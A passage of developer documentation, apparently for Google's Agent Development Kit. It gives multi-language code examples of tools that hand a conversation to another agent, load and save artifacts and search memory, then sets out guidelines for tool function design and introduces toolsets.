main_agent.sub_agents = [support_agent] # Session and Runner async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=main_agent, app_name=APP_NAME, session_service=session_service) return session, runner # Agent Interaction async def call_agent_async(query): content = types.Content(role='user', parts=[types.Part(text=query)]) session, runner = await setup_session_and_runner() events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) async for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("Agent Response: ", final_response) # Note: In Colab, you can directly use 'await' at the top level. # If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async("this is urgent, i cant login") ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, FunctionTool, ToolContext, InMemoryRunner, isFinalResponse, stringifyContent } from "@google/adk"; import { z } from "zod"; import { Content, createUserContent } from "@google/genai"; function checkAndTransfer( params: { query: string }, toolContext?: ToolContext ): Record { if (!toolContext) { // This should not happen in a normal ADK flow where the tool is called by an agent. throw new Error("ToolContext is required to transfer agents."); } if (params.query.toLowerCase().includes("urgent")) { console.log("Tool: Urgent query detected, transferring to support_agent."); toolContext.actions.transferToAgent = "support_agent"; return { status: "success", message: "Transferring to support agent." }; } console.log("Tool: Query is not urgent, handling normally."); return { status: "success", message: "Query will be handled by the main agent." }; } const transferTool = new FunctionTool({ name: "check_and_transfer", description: "Checks the user's query and transfers to a support agent if urgent.", parameters: z.object({ query: z.string().describe("The user query to analyze."), }), execute: checkAndTransfer, }); const supportAgent = new LlmAgent({ name: "support_agent", description: "Handles urgent user requests about accounts.", instruction: "You are the support agent. Handle the user's urgent request.", model: "gemini-2.5-flash" }); const mainAgent = new LlmAgent({ name: "main_agent", description: "The main agent that routes non-urgent queries.", instruction: "You are the main agent. Use the check_and_transfer tool to analyze the user query. If the query is not urgent, handle it yourself.", tools: [transferTool], subAgents: [supportAgent], model: "gemini-2.5-flash" }); async function main() { const runner = new InMemoryRunner({ agent: mainAgent, appName: "customer_support_app" }); console.log("--- Running with a non-urgent query ---"); await runner.sessionService.createSession({ appName: "customer_support_app", userId: "user1", sessionId: "session1" }); const nonUrgentMessage: Content = createUserContent("I have a general question about my account."); for await (const event of runner.runAsync({ userId: "user1", sessionId: "session1", newMessage: nonUrgentMessage })) { if (isFinalResponse(event) && event.content?.parts?.length) { const text = stringifyContent(event).trim(); if (text) { console.log(`Final Response: ${text}`); } } } console.log("\n--- Running with an urgent query ---"); await runner.sessionService.createSession({ appName: "customer_support_app", userId: "user1", sessionId: "session2" }); const urgentMessage: Content = createUserContent("My account is locked and this is urgent!"); for await (const event of runner.runAsync({ userId: "user1", sessionId: "session2", newMessage: urgentMessage })) { if (isFinalResponse(event) && event.content?.parts?.length) { const text = stringifyContent(event).trim(); if (text) { console.log(`Final Response: ${text}`); } } } } main(); ``` ```go // Copyright 2025 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package main import ( "context" "fmt" "log" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) type checkAndTransferArgs struct { Query string `json:"query" jsonschema:"The user's query to check for urgency."` } type checkAndTransferResult struct { Status string `json:"status"` } func checkAndTransfer(ctx tool.Context, args checkAndTransferArgs) (checkAndTransferResult, error) { if strings.Contains(strings.ToLower(args.Query), "urgent") { fmt.Println("Tool: Detected urgency, transferring to the support agent.") ctx.Actions().TransferToAgent = "support_agent" return checkAndTransferResult{Status: "Transferring to the support agent..."}, nil } return checkAndTransferResult{Status: fmt.Sprintf("Processed query: '%s'. No further action needed.", args.Query)}, nil } func main() { ctx := context.Background() model, err := gemini.NewModel(ctx, "gemini-2.0-flash", &genai.ClientConfig{}) if err != nil { log.Fatal(err) } supportAgent, err := llmagent.New(llmagent.Config{ Name: "support_agent", Model: model, Instruction: "You are the dedicated support agent. Mentioned you are a support handler and please help the user with their urgent issue.", }) if err != nil { log.Fatal(err) } checkAndTransferTool, err := functiontool.New( functiontool.Config{ Name: "check_and_transfer", Description: "Checks if the query requires escalation and transfers to another agent if needed.", }, checkAndTransfer, ) if err != nil { log.Fatal(err) } mainAgent, err := llmagent.New(llmagent.Config{ Name: "main_agent", Model: model, Instruction: "You are the first point of contact for customer support of an analytics tool. Answer general queries. If the user indicates urgency, use the 'check_and_transfer' tool.", Tools: []tool.Tool{checkAndTransferTool}, SubAgents: []agent.Agent{supportAgent}, }) if err != nil { log.Fatal(err) } sessionService := session.InMemoryService() runner, err := runner.New(runner.Config{ AppName: "customer_support_agent", Agent: mainAgent, SessionService: sessionService, }) if err != nil { log.Fatal(err) } session, err := sessionService.Create(ctx, &session.CreateRequest{ AppName: "customer_support_agent", UserID: "user1234", }) if err != nil { log.Fatal(err) } run(ctx, runner, session.Session.ID(), "this is urgent, i cant login") } func run(ctx context.Context, r *runner.Runner, sessionID string, prompt string) { fmt.Printf("\n> %s\n", prompt) events := r.Run( ctx, "user1234", sessionID, genai.NewContentFromText(prompt, genai.RoleUser), agent.RunConfig{ StreamingMode: agent.StreamingModeNone, }, ) for event, err := range events { if err != nil { log.Fatalf("ERROR during agent execution: %v", err) } if event.Content.Parts[0].Text != "" { fmt.Printf("Agent Response: %s\n", event.Content.Parts[0].Text) } } } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; import com.google.adk.sessions.Session; import com.google.adk.tools.Annotations.Schema; import com.google.adk.tools.FunctionTool; import com.google.adk.tools.ToolContext; import com.google.common.collect.ImmutableList; import com.google.genai.types.Content; import com.google.genai.types.Part; import java.util.HashMap; import java.util.Locale; import java.util.Map; public class CustomerSupportAgentApp { private static final String APP_NAME = "customer_support_agent"; private static final String USER_ID = "user1234"; private static final String SESSION_ID = "1234"; private static final String MODEL_ID = "gemini-2.0-flash"; /** * Checks if the query requires escalation and transfers to another agent if needed. * * @param query The user's query. * @param toolContext The context for the tool. * @return A map indicating the result of the check and transfer. */ public static Map checkAndTransfer( @Schema(name = "query", description = "the user query") String query, @Schema(name = "toolContext", description = "the tool context") ToolContext toolContext) { Map response = new HashMap<>(); if (query.toLowerCase(Locale.ROOT).contains("urgent")) { System.out.println("Tool: Detected urgency, transferring to the support agent."); toolContext.actions().setTransferToAgent("support_agent"); response.put("status", "transferring"); response.put("message", "Transferring to the support agent..."); } else { response.put("status", "processed"); response.put( "message", String.format("Processed query: '%s'. No further action needed.", query)); } return response; } /** * Calls the agent with the given query and prints the final response. * * @param runner The runner to use. * @param query The query to send to the agent. */ public static void callAgent(Runner runner, String query) { Content content = Content.fromParts(Part.fromText(query)); InMemorySessionService sessionService = (InMemorySessionService) runner.sessionService(); // Fixed: session ID does not need to be an optional. Session session = sessionService .createSession(APP_NAME, USER_ID, /* state= */ null, SESSION_ID) .blockingGet(); runner .runAsync(session.userId(), session.id(), content) .forEach( event -> { if (event.finalResponse() && event.content().isPresent() && event.content().get().parts().isPresent() && !event.content().get().parts().get().isEmpty() && event.content().get().parts().get().get(0).text().isPresent()) { String finalResponse = event.content().get().parts().get().get(0).text().get(); System.out.println("Agent Response: " + finalResponse); } }); } public static void main(String[] args) throws NoSuchMethodException { FunctionTool escalationTool = FunctionTool.create( CustomerSupportAgentApp.class.getMethod( "checkAndTransfer", String.class, ToolContext.class)); LlmAgent supportAgent = LlmAgent.builder() .model(MODEL_ID) .name("support_agent") .description(""" The dedicated support agent. Mentions it is a support handler and helps the user with their urgent issue. """) .instruction(""" You are the dedicated support agent. Mentioned you are a support handler and please help the user with their urgent issue. """) .build(); LlmAgent mainAgent = LlmAgent.builder() .model(MODEL_ID) .name("main_agent") .description(""" The first point of contact for customer support of an analytics tool. Answers general queries. If the user indicates urgency, uses the 'check_and_transfer' tool. """) .instruction(""" You are the first point of contact for customer support of an analytics tool. Answer general queries. If the user indicates urgency, use the 'check_and_transfer' tool. """) .tools(ImmutableList.of(escalationTool)) .subAgents(supportAgent) .build(); // Fixed: LlmAgent.subAgents() expects 0 arguments. // Sub-agents are now added to the main agent via its builder, // as `subAgents` is a property that should be set during agent construction // if it's not dynamically managed. InMemorySessionService sessionService = new InMemorySessionService(); Runner runner = new Runner(mainAgent, APP_NAME, null, sessionService); // Agent Interaction callAgent(runner, "this is urgent, i cant login"); } } ``` ##### Explanation - We define two agents: `main_agent` and `support_agent`. The `main_agent` is designed to be the initial point of contact. - The `check_and_transfer` tool, when called by `main_agent`, examines the user's query. - If the query contains the word "urgent", the tool accesses the `tool_context`, specifically **`tool_context.actions`**, and sets the transfer_to_agent attribute to `support_agent`. - This action signals to the framework to **transfer the control of the conversation to the agent named `support_agent`**. - When the `main_agent` processes the urgent query, the `check_and_transfer` tool triggers the transfer. The subsequent response would ideally come from the `support_agent`. - For a normal query without urgency, the tool simply processes it without triggering a transfer. This example illustrates how a tool, through EventActions in its ToolContext, can dynamically influence the flow of the conversation by transferring control to another specialized agent. ### **Authentication** ToolContext provides mechanisms for tools interacting with authenticated APIs. If your tool needs to handle authentication, you might use the following: - **`auth_response`** (in Python): Contains credentials (e.g., a token) if authentication was already handled by the framework before your tool was called (common with RestApiTool and OpenAPI security schemes). In TypeScript, this is retrieved via the getAuthResponse() method. - **`request_credential(auth_config: dict)`** (in Python) or **`requestCredential(authConfig: AuthConfig)`** (in TypeScript): Call this method if your tool determines authentication is needed but credentials aren't available. This signals the framework to start an authentication flow based on the provided auth_config. - **`get_auth_response()`** (in Python) or **`getAuthResponse(authConfig: AuthConfig)`** (in TypeScript): Call this in a subsequent invocation (after request_credential was successfully handled) to retrieve the credentials the user provided. For detailed explanations of authentication flows, configuration, and examples, please refer to the dedicated Tool Authentication documentation page. ### **Context-Aware Data Access Methods** These methods provide convenient ways for your tool to interact with persistent data associated with the session or user, managed by configured services. - **`list_artifacts()`** (in Python) or **`listArtifacts()`** (in Java and TypeScript): Returns a list of filenames (or keys) for all artifacts currently stored for the session via the artifact_service. Artifacts are typically files (images, documents, etc.) uploaded by the user or generated by tools/agents. - **`load_artifact(filename: str)`**: Retrieves a specific artifact by its filename from the **artifact_service**. You can optionally specify a version; if omitted, the latest version is returned. Returns a `google.genai.types.Part` object containing the artifact data and mime type, or None if not found. - **`save_artifact(filename: str, artifact: types.Part)`**: Saves a new version of an artifact to the artifact_service. Returns the new version number (starting from 0). - **`search_memory(query: str)`**: (Support in ADK Python, Go and TypeScript) Queries the user's long-term memory using the configured `memory_service`. This is useful for retrieving relevant information from past interactions or stored knowledge. The structure of the **SearchMemoryResponse** depends on the specific memory service implementation but typically contains relevant text snippets or conversation excerpts. #### Example ```py # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from google.adk.tools import ToolContext, FunctionTool from google.genai import types def process_document( document_name: str, analysis_query: str, tool_context: ToolContext ) -> dict: """Analyzes a document using context from memory.""" # 1. Load the artifact print(f"Tool: Attempting to load artifact: {document_name}") document_part = tool_context.load_artifact(document_name) if not document_part: return {"status": "error", "message": f"Document '{document_name}' not found."} document_text = document_part.text # Assuming it's text for simplicity print(f"Tool: Loaded document '{document_name}' ({len(document_text)} chars).") # 2. Search memory for related context print(f"Tool: Searching memory for context related to: '{analysis_query}'") memory_response = tool_context.search_memory( f"Context for analyzing document about {analysis_query}" ) memory_context = "\n".join( [ m.events[0].content.parts[0].text for m in memory_response.memories if m.events and m.events[0].content ] ) # Simplified extraction print(f"Tool: Found memory context: {memory_context[:100]}...") # 3. Perform analysis (placeholder) analysis_result = f"Analysis of '{document_name}' regarding '{analysis_query}' using memory context: [Placeholder Analysis Result]" print("Tool: Performed analysis.") # 4. Save the analysis result as a new artifact analysis_part = types.Part.from_text(text=analysis_result) new_artifact_name = f"analysis_{document_name}" version = await tool_context.save_artifact(new_artifact_name, analysis_part) print(f"Tool: Saved analysis result as '{new_artifact_name}' version {version}.") return { "status": "success", "analysis_artifact": new_artifact_name, "version": version, } doc_analysis_tool = FunctionTool(func=process_document) # In an Agent: # Assume artifact 'report.txt' was previously saved. # Assume memory service is configured and has relevant past data. # my_agent = Agent(..., tools=[doc_analysis_tool], artifact_service=..., memory_service=...) ``` ```typescript import { Part } from "@google/genai"; import { ToolContext } from "@google/adk"; // Analyzes a document using context from memory. export async function processDocument( params: { documentName: string; analysisQuery: string }, toolContext?: ToolContext ): Promise> { if (!toolContext) { throw new Error("ToolContext is required for this tool."); } // 1. List all available artifacts const artifacts = await toolContext.listArtifacts(); console.log(`Listing all available artifacts: ${artifacts}`); // 2. Load an artifact console.log(`Tool: Attempting to load artifact: ${params.documentName}`); const documentPart = await toolContext.loadArtifact(params.documentName); if (!documentPart) { console.log(`Tool: Document '${params.documentName}' not found.`); return { status: "error", message: `Document '${params.documentName}' not found.`, }; } const documentText = documentPart.text ?? ""; console.log( `Tool: Loaded document '${params.documentName}' (${documentText.length} chars).` ); // 3. Search memory for related context console.log(`Tool: Searching memory for context related to '${params.analysisQuery}'`); const memory_results = await toolContext.searchMemory(params.analysisQuery); console.log(`Tool: Found ${memory_results.memories.length} relevant memories.`); const context_from_memory = memory_results.memories .map((m) => m.content.parts[0].text) .join("\n"); // 4. Perform analysis (placeholder) const analysisResult = `Analysis of '${params.documentName}' regarding '${params.analysisQuery}':\n` + `Context from Memory:\n${context_from_memory}\n` + `[Placeholder Analysis Result]`; console.log("Tool: Performed analysis."); // 5. Save the analysis result as a new artifact const analysisPart: Part = { text: analysisResult }; const newArtifactName = `analysis_${params.documentName}`; await toolContext.saveArtifact(newArtifactName, analysisPart); console.log(`Tool: Saved analysis result to '${newArtifactName}'.`); return { status: "success", analysis_artifact: newArtifactName, }; } ``` ```go // Copyright 2025 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package main import ( "fmt" "google.golang.org/adk/tool" "google.golang.org/genai" ) type processDocumentArgs struct { DocumentName string `json:"document_name" jsonschema:"The name of the document to be processed."` AnalysisQuery string `json:"analysis_query" jsonschema:"The query for the analysis."` } type processDocumentResult struct { Status string `json:"status"` AnalysisArtifact string `json:"analysis_artifact,omitempty"` Version int64 `json:"version,omitempty"` Message string `json:"message,omitempty"` } func processDocument(ctx tool.Context, args processDocumentArgs) (*processDocumentResult, error) { fmt.Printf("Tool: Attempting to load artifact: %s\n", args.DocumentName) // List all artifacts listResponse, err := ctx.Artifacts().List(ctx) if err != nil { return nil, fmt.Errorf("failed to list artifacts") } fmt.Println("Tool: Available artifacts:") for _, file := range listResponse.FileNames { fmt.Printf(" - %s\n", file) } documentPart, err := ctx.Artifacts().Load(ctx, args.DocumentName) if err != nil { return nil, fmt.Errorf("document '%s' not found", args.DocumentName) } fmt.Printf("Tool: Loaded document '%s' of size %d bytes.\n", args.DocumentName, len(documentPart.Part.InlineData.Data)) // 3. Search memory for related context fmt.Printf("Tool: Searching memory for context related to: '%s'\n", args.AnalysisQuery) memoryResp, err := ctx.SearchMemory(ctx, args.AnalysisQuery) if err != nil { fmt.Printf("Tool: Error searching memory: %v\n", err) } memoryResultCount := 0 if memoryResp != nil { memoryResultCount = len(memoryResp.Memories) } fmt.Printf("Tool: Found %d memory results.\n", memoryResultCount) analysisResult := fmt.Sprintf("Analysis of '%s' regarding '%s' using memory context: [Placeholder Analysis Result]", args.DocumentName, args.AnalysisQuery) fmt.Println("Tool: Performed analysis.") analysisPart := genai.NewPartFromText(analysisResult) newArtifactName := fmt.Sprintf("analysis_%s", args.DocumentName) version, err := ctx.Artifacts().Save(ctx, newArtifactName, analysisPart) if err != nil { return nil, fmt.Errorf("failed to save artifact") } fmt.Printf("Tool: Saved analysis result as '%s' version %d.\n", newArtifactName, version.Version) return &processDocumentResult{ Status: "success", AnalysisArtifact: newArtifactName, Version: version.Version, }, nil } ``` ```java // Analyzes a document using context from memory. // You can also list, load and save artifacts using Callback Context or LoadArtifacts tool. public static @NonNull Maybe> processDocument( @Annotations.Schema(description = "The name of the document to analyze.") String documentName, @Annotations.Schema(description = "The query for the analysis.") String analysisQuery, ToolContext toolContext) { // 1. List all available artifacts System.out.printf( "Listing all available artifacts %s:", toolContext.listArtifacts().blockingGet()); // 2. Load an artifact to memory System.out.println("Tool: Attempting to load artifact: " + documentName); Part documentPart = toolContext.loadArtifact(documentName, Optional.empty()).blockingGet(); if (documentPart == null) { System.out.println("Tool: Document '" + documentName + "' not found."); return Maybe.just( ImmutableMap.of( "status", "error", "message", "Document '" + documentName + "' not found.")); } String documentText = documentPart.text().orElse(""); System.out.println( "Tool: Loaded document '" + documentName + "' (" + documentText.length() + " chars)."); // 3. Perform analysis (placeholder) String analysisResult = "Analysis of '" + documentName + "' regarding '" + analysisQuery + " [Placeholder Analysis Result]"; System.out.println("Tool: Performed analysis."); // 4. Save the analysis result as a new artifact Part analysisPart = Part.fromText(analysisResult); String newArtifactName = "analysis_" + documentName; toolContext.saveArtifact(newArtifactName, analysisPart); return Maybe.just( ImmutableMap.builder() .put("status", "success") .put("analysis_artifact", newArtifactName) .build()); } // FunctionTool processDocumentTool = // FunctionTool.create(ToolContextArtifactExample.class, "processDocument"); // In the Agent, include this function tool. // LlmAgent agent = LlmAgent().builder().tools(processDocumentTool).build(); ``` By leveraging the **ToolContext**, developers can create more sophisticated and context-aware custom tools that seamlessly integrate with ADK's architecture and enhance the overall capabilities of their agents. ## Defining Effective Tool Functions When using a method or function as an ADK Tool, how you define it significantly impacts the agent's ability to use it correctly. The agent's Large Language Model (LLM) relies heavily on the function's **name**, **parameters (arguments)**, **type hints**, and **docstring** / **source code comments** to understand its purpose and generate the correct call. Here are key guidelines for defining effective tool functions: - **Function Name:** - Use descriptive, verb-noun based names that clearly indicate the action (e.g., `get_weather`, `searchDocuments`, `schedule_meeting`). - Avoid generic names like `run`, `process`, `handle_data`, or overly ambiguous names like `doStuff`. Even with a good description, a name like `do_stuff` might confuse the model about when to use the tool versus, for example, `cancelFlight`. - The LLM uses the function name as a primary identifier during tool selection. - **Parameters (Arguments):** - Your function can have any number of parameters. - Use clear and descriptive names (e.g., `city` instead of `c`, `search_query` instead of `q`). - **Provide type hints in Python** for all parameters (e.g., `city: str`, `user_id: int`, `items: list[str]`). This is essential for ADK to generate the correct schema for the LLM. - Ensure all parameter types are **JSON serializable**. All java primitives as well as standard Python types like `str`, `int`, `float`, `bool`, `list`, `dict`, and their combinations are generally safe. Avoid complex custom class instances as direct parameters unless they have a clear JSON representation. - **Do not set default values** for parameters. E.g., `def my_func(param1: str = "default")`. Default values are not reliably supported or used by the underlying models during function call generation. All necessary information should be derived by the LLM from the context or explicitly requested if missing. - **`self` / `cls` Handled Automatically:** Implicit parameters like `self` (for instance methods) or `cls` (for class methods) are automatically handled by ADK and excluded from the schema shown to the LLM. You only need to define type hints and descriptions for the logical parameters your tool requires the LLM to provide. - **Return Type:** - The function's return value **must be a dictionary (`dict`)** in Python, a **Map** in Java, or a plain **object** in TypeScript. - If your function returns a non-dictionary type (e.g., a string, number, list), the ADK framework will automatically wrap it into a dictionary/Map like `{'result': your_original_return_value}` before passing the result back to the model. - Design the dictionary/Map keys and values to be **descriptive and easily understood *by the LLM***. Remember, the model reads this output to decide its next step. - Include meaningful keys. For example, instead of returning just an error code like `500`, return `{'status': 'error', 'error_message': 'Database connection failed'}`. - It's a **highly recommended practice** to include a `status` key (e.g., `'success'`, `'error'`, `'pending'`, `'ambiguous'`) to clearly indicate the outcome of the tool execution for the model. - **Docstring / Source Code Comments:** - **This is critical.** The docstring is the primary source of descriptive information for the LLM. - **Clearly state what the tool *does*.** Be specific about its purpose and limitations. - **Explain *when* the tool should be used.** Provide context or example scenarios to guide the LLM's decision-making. - **Describe *each parameter* clearly.** Explain what information the LLM needs to provide for that argument. - Describe the **structure and meaning of the expected `dict` return value**, especially the different `status` values and associated data keys. - **Do not describe the injected ToolContext parameter**. Avoid mentioning the optional `tool_context: ToolContext` parameter within the docstring description since it is not a parameter the LLM needs to know about. ToolContext is injected by ADK, *after* the LLM decides to call it. **Example of a good definition:** ```python def lookup_order_status(order_id: str) -> dict: """Fetches the current status of a customer's order using its ID. Use this tool ONLY when a user explicitly asks for the status of a specific order and provides the order ID. Do not use it for general inquiries. Args: order_id: The unique identifier of the order to look up. Returns: A dictionary indicating the outcome. On success, status is 'success' and includes an 'order' dictionary. On failure, status is 'error' and includes an 'error_message'. Example success: {'status': 'success', 'order': {'state': 'shipped', 'tracking_number': '1Z9...'}} Example error: {'status': 'error', 'error_message': 'Order ID not found.'} """ # ... function implementation to fetch status ... if status_details := fetch_status_from_backend(order_id): return { "status": "success", "order": { "state": status_details.state, "tracking_number": status_details.tracking, }, } else: return {"status": "error", "error_message": f"Order ID {order_id} not found."} ``` ```typescript /** * Fetches the current status of a customer's order using its ID. * * Use this tool ONLY when a user explicitly asks for the status of * a specific order and provides the order ID. Do not use it for * general inquiries. * * @param params The parameters for the function. * @param params.order_id The unique identifier of the order to look up. * @returns A dictionary indicating the outcome. * On success, status is 'success' and includes an 'order' dictionary. * On failure, status is 'error' and includes an 'error_message'. * Example success: {'status': 'success', 'order': {'state': 'shipped', 'tracking_number': '1Z9...'}} * Example error: {'status': 'error', 'error_message': 'Order ID not found.'} */ async function lookupOrderStatus(params: { order_id: string }): Promise> { // ... function implementation to fetch status from a backend ... const status_details = await fetchStatusFromBackend(params.order_id); if (status_details) { return { "status": "success", "order": { "state": status_details.state, "tracking_number": status_details.tracking, }, }; } else { return { "status": "error", "error_message": `Order ID ${params.order_id} not found.` }; } } // Placeholder for a backend call async function fetchStatusFromBackend(order_id: string): Promise<{state: string, tracking: string} | null> { if (order_id === "12345") { return { state: "shipped", tracking: "1Z9..." }; } return null; } ``` ```go import ( "fmt" "google.golang.org/adk/tool" ) type lookupOrderStatusArgs struct { OrderID string `json:"order_id" jsonschema:"The ID of the order to look up."` } type order struct { State string `json:"state"` TrackingNumber string `json:"tracking_number"` } type lookupOrderStatusResult struct { Status string `json:"status"` Order order `json:"order,omitempty"` } func lookupOrderStatus(ctx tool.Context, args lookupOrderStatusArgs) (*lookupOrderStatusResult, error) { // ... function implementation to fetch status ... statusDetails, ok := fetchStatusFromBackend(args.OrderID) if !ok { return nil, fmt.Errorf("order ID %s not found", args.OrderID) } return &lookupOrderStatusResult{ Status: "success", Order: order{ State: statusDetails.State, TrackingNumber: statusDetails.Tracking, }, }, nil } ``` ```java /** * Retrieves the current weather report for a specified city. * * @param city The city for which to retrieve the weather report. * @param toolContext The context for the tool. * @return A dictionary containing the weather information. */ public static Map getWeatherReport(String city, ToolContext toolContext) { Map response = new HashMap<>(); if (city.toLowerCase(Locale.ROOT).equals("london")) { response.put("status", "success"); response.put( "report", "The current weather in London is cloudy with a temperature of 18 degrees Celsius and a" + " chance of rain."); } else if (city.toLowerCase(Locale.ROOT).equals("paris")) { response.put("status", "success"); response.put("report", "The weather in Paris is sunny with a temperature of 25 degrees Celsius."); } else { response.put("status", "error"); response.put("error_message", String.format("Weather information for '%s' is not available.", city)); } return response; } ``` - **Simplicity and Focus:** - **Keep Tools Focused:** Each tool should ideally perform one well-defined task. - **Fewer Parameters are Better:** Models generally handle tools with fewer, clearly defined parameters more reliably than those with many optional or complex ones. - **Use Simple Data Types:** Prefer basic types (`str`, `int`, `bool`, `float`, `List[str]`, in **Python**; `int`, `byte`, `short`, `long`, `float`, `double`, `boolean` and `char` in **Java**; or `string`, `number`, `boolean`, and arrays like `string[]` in **TypeScript**) over complex custom classes or deeply nested structures as parameters when possible. - **Decompose Complex Tasks:** Break down functions that perform multiple distinct logical steps into smaller, more focused tools. For instance, instead of a single `update_user_profile(profile: ProfileObject)` tool, consider separate tools like `update_user_name(name: str)`, `update_user_address(address: str)`, `update_user_preferences(preferences: list[str])`, etc. This makes it easier for the LLM to select and use the correct capability. By adhering to these guidelines, you provide the LLM with the clarity and structure it needs to effectively utilize your custom function tools, leading to more capable and reliable agent behavior. ## Toolsets: Grouping and Dynamically Providing Tools Supported in ADKPython v0.5.0Typescript v0.2.0 Beyond individual tools, ADK introduces the concept of a **Toolset** via the `BaseToolset` interface (defined in `google.adk.tools.base_toolset`). A toolset allows you to manage and provide a collection of `BaseTool` instances, often dynamically, to an agent. This approach is beneficial for: - **Organizing Related Tools:** Grouping tools that serve a common purpose (e.g., all tools for mathematical operations, or all tools interacting with a specific API). - **Dynamic Tool Availability:** Enabling an agent to have different tools available based on the current context (e.g., user permissions, session state, or other runtime conditions). The `get_tools` method of a toolset can decide which tools to expose. - **Integrating External Tool Providers:** Toolsets can act as adapters for tools coming from external systems, like an OpenAPI specification or an MCP server, converting them into ADK-compatible `BaseTool` objects. ### The `BaseToolset` Interface Any class acting as a toolset in ADK should implement the `BaseToolset` abstract base class. This interface primarily defines two methods: - **`async def get_tools(...) -> list[BaseTool]:`** This is the core method of a toolset. When an ADK agent needs to know its available tools, it will call `get_tools()` on each `BaseToolset` instance provided in its `tools` list. - It receives an optional `readonly_context` (an instance of `ReadonlyContext`). This context provides read-only access to information like the current session state (`readonly_context.state`), agent name, and invocation ID. The toolset can use this context to dynamically decide which tools to return. - It **must** return a `list` of `BaseTool` instances (e.g., `FunctionTool`, `RestApiTool`). - **`async def close(self) -> None:`** This asynchronous method is called by the ADK framework when the toolset is no longer needed, for example, when an agent server is shutting down or the `Runner` is being closed. Implement this method to perform any necessary cleanup, such as closing network connections, releasing file handles, or cleaning up other resources managed by the toolset. ### Using Toolsets with Agents You can include instances of your `BaseToolset` implementations directly in an `LlmAgent`'s `tools` list, alongside individual `BaseTool` instances. When the agent initializes or needs to determine its available capabilities, the ADK framework will iterate through the `tools` list: - If an item is a `BaseTool` instance, it's used directly. - If an item is a `BaseToolset` instance, its `get_tools()` method is called (with the current `ReadonlyContext`), and the returned list of `BaseTool`s is added to the agent's available tools. ### Example: A Simple Math Toolset Let's create a basic example of a toolset that provides simple arithmetic operations. ```py # 1. Define the individual tool functions def add_numbers(a: int, b: int, tool_context: ToolContext) -> Dict[str, Any]: """Adds two integer numbers. Args: a: The first number. b: The second number. Returns: A dictionary with the sum, e.g., {'status': 'success', 'result': 5} """ print(f"Tool: add_numbers called with a={a}, b={b}") result = a + b # Example: Storing something in tool_context state tool_context.state["last_math_operation"] = "addition" return {"status": "success", "result": result} def subtract_numbers(a: int, b: int) -> Dict[str, Any]: """Subtracts the second number from the first. Args: a: The first number. b: The second number. Returns: A dictionary with the difference, e.g., {'status': 'success', 'result': 1} """ print(f"Tool: subtract_numbers called with a={a}, b={b}") return {"status": "success", "result": a - b} # 2. Create the Toolset by implementing BaseToolset class SimpleMathToolset(BaseToolset): def __init__(self, prefix: str = "math_"): self.prefix = prefix # Create FunctionTool instances once self._add_tool = FunctionTool( func=add_numbers, name=f"{self.prefix}add_numbers", # Toolset can customize names ) self._subtract_tool = FunctionTool( func=subtract_numbers, name=f"{self.prefix}subtract_numbers" ) print(f"SimpleMathToolset initialized with prefix '{self.prefix}'") async def get_tools( self, readonly_context: Optional[ReadonlyContext] = None ) -> List[BaseTool]: print(f"SimpleMathToolset.get_tools() called.") # Example of dynamic behavior: # Could use readonly_context.state to decide which tools to return # For instance, if readonly_context.state.get("enable_advanced_math"): # return [self._add_tool, self._subtract_tool, self._multiply_tool] # For this simple example, always return both tools tools_to_return = [self._add_tool, self._subtract_tool] print(f"SimpleMathToolset providing tools: {[t.name for t in tools_to_return]}") return tools_to_return async def close(self) -> None: # No resources to clean up in this simple example print(f"SimpleMathToolset.close() called for prefix '{self.prefix}'.") await asyncio.sleep(0) # Placeholder for async cleanup if needed # 3. Define an individual tool (not part of the toolset) def greet_user(name: str = "User") -> Dict[str, str]: """Greets the user.""" print(f"Tool: greet_user called with name={name}") return {"greeting": f"Hello, {name}!"} greet_tool = FunctionTool(func=greet_user) # 4. Instantiate the toolset math_toolset_instance = SimpleMathToolset(prefix="calculator_") # 5. Define an agent that uses both the individual tool and the toolset calculator_agent = LlmAgent( name="CalculatorAgent", model="gemini-2.0-flash", # Replace with your desired model instruction="You are a helpful calculator and greeter. " "Use 'greet_user' for greetings. " "Use 'calculator_add_numbers' to add and 'calculator_subtract_numbers' to subtract. " "Announce the state of 'last_math_operation' if it's set.", tools=[greet_tool, math_toolset_instance], # Individual tool # Toolset instance ) ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the 